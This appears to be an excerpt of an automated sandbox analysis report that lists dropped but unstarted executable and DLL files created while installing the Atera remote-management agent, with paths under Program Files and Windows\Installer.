                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 442ad9.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4C16.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI46E3.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7BC1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7BC1.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC4E9.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA1C8.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI31B4.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6CA1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI77D8.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI77D8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 442ad8.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeDropped PE file which has not been started: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI77D8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI31B4.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E58.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC41B.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI46E3.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC499.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6CA1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
